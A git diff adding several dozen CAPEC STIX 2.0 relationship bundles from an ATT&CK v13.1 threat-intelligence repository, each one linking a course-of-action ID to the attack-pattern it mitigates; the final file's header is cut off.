diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json new file mode 100644 index 0000000000000000000000000000000000000000..6395eb37bc7de9b4b95b13cfdbea981d38e82118 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6960cb6e-48ec-4566-993d-7b68fe5a7cfa", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json new file mode 100644 index 0000000000000000000000000000000000000000..78c9a70f86428c51b663f5be6a5fdb75534466bd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--da618b71-4fde-4cf2-8cec-fd66a6f445eb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json new file mode 100644 index 0000000000000000000000000000000000000000..95caa4ab2c171fb62a43a92e5e19da3549065890 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--11a777fa-19fc-4421-9e27-925ed461657d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json new file mode 100644 index 0000000000000000000000000000000000000000..b984f02ca5f5f1786d09d2b8da35073c38fe3a79 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--31fb90da-894a-47b0-a1a7-2b2797885a57", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json new file mode 100644 index 0000000000000000000000000000000000000000..555aa59d673015f1649bc05919e03cea423794d2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--c8cf995f-c4ea-4b99-b9ad-e86fe77b7f6d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json new file mode 100644 index 0000000000000000000000000000000000000000..8d40d7ee5f5dc096b0948691a9439c9c68e1e4e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--79cbfcd9-f877-43c2-9ae7-d42d1ad3c816", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json new file mode 100644 index 0000000000000000000000000000000000000000..65a0f42697bfba4d1c4237e9b0c3640f35b94e7a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e1fd9e4c-3f9d-4872-b0a3-d16c67a6aae4", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json new file mode 100644 index 0000000000000000000000000000000000000000..4c91814304a7c6239670594424d9dbc6032e38ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--79fdeba4-bb49-4e7f-8d1d-1cdf8c007111", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0174af7d-b07c-4326-98d7-485d81f6876c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json new file mode 100644 index 0000000000000000000000000000000000000000..e12653f9e480cf95311cc83d736617abe65b621d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f853ba5f-7294-4707-a506-47bec3db02f1", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json new file mode 100644 index 0000000000000000000000000000000000000000..23005d3cdf0b064b5412ca2b84bcb50f7ddd933c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--514bbce7-b27c-4d9f-83e6-36ffb97a69df", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json new file mode 100644 index 0000000000000000000000000000000000000000..1b10908c08ac51a5abf83c61695f06afd36d6cbb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--73a88d72-5f6f-4a42-bf8c-be27f9a397da", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json new file mode 100644 index 0000000000000000000000000000000000000000..ebd8c162891ecadbbb43394d0cff81d425eaa8ba --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1c0baafb-fb6f-453d-8113-e1c96e459593", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json new file mode 100644 index 0000000000000000000000000000000000000000..5b0043398a5ce80d6b31293994f35390f6855a5c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--287aae00-759b-4cca-b091-882b1b9ce3c3", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json new file mode 100644 index 0000000000000000000000000000000000000000..6802cfe45d9e21cf796acec1feb2c58a3bea56bb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--30ac9bd2-8137-4d59-8a6c-ae63b201a255", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json new file mode 100644 index 0000000000000000000000000000000000000000..64cf1330e94869c83d94deb09066b7373681d3f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--629ca3ee-1039-433a-8e93-ad9527bd25a3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ed0f42c-e94a-4d92-be95-06df4d69c7b7", + "target_ref": "attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json new file mode 100644 index 0000000000000000000000000000000000000000..788e5dbe925673b0ad8e051aed7a685b468775fe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4cf9231b-34f7-4eda-ac49-44d24192183f", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json new file mode 100644 index 0000000000000000000000000000000000000000..12dd78ca5ce400bd361df1b22d33811d78446424 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--96f3dbb9-ad46-4def-bc74-f219105c992e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--041ce232-81d4-4940-904b-9b54892a622c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--041ce232-81d4-4940-904b-9b54892a622c.json new file mode 100644 index 0000000000000000000000000000000000000000..4671d0fac7300e9ebf96f240fb88b50842ae9dd2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--041ce232-81d4-4940-904b-9b54892a622c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f7a65214-ea5c-4598-848d-117f1a0479a4", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--041ce232-81d4-4940-904b-9b54892a622c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--75e2e783-d31a-4fa4-9ea6-6ae04e366cb4", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json new file mode 100644 index 0000000000000000000000000000000000000000..c698b5c401621c36c54add507dbe5c24a9c737e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7e707b2a-9dcc-4373-a05a-7d87e19aeb09", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json new file mode 100644 index 0000000000000000000000000000000000000000..753b32fa7b2d9552a20881891f84967f671e60fa --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--73406f0f-f9e2-43ec-a675-81415993cd46", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json new file mode 100644 index 0000000000000000000000000000000000000000..e55cafe82ed2a2153e1ad85801cbf6ffbd6d03b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0e6013b8-f362-4677-8ffe-a263d712b864", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json new file mode 100644 index 0000000000000000000000000000000000000000..d9c40e981294a256303b91ced9994955e67faecd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5ead7480-40b9-44cf-b419-aecc39007277", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0492ba63-8134-4235-a371-e1cf83184a85.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0492ba63-8134-4235-a371-e1cf83184a85.json new file mode 100644 index 0000000000000000000000000000000000000000..cdab1b367dfc1df2e1f8676f9cee68e1b186e42c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0492ba63-8134-4235-a371-e1cf83184a85.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--2b3b624c-25a8-4b7e-88b3-a43fcad50276", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0492ba63-8134-4235-a371-e1cf83184a85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04ce1f7f-b24d-413f-a857-e285a30a2271.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04ce1f7f-b24d-413f-a857-e285a30a2271.json new file mode 100644 index 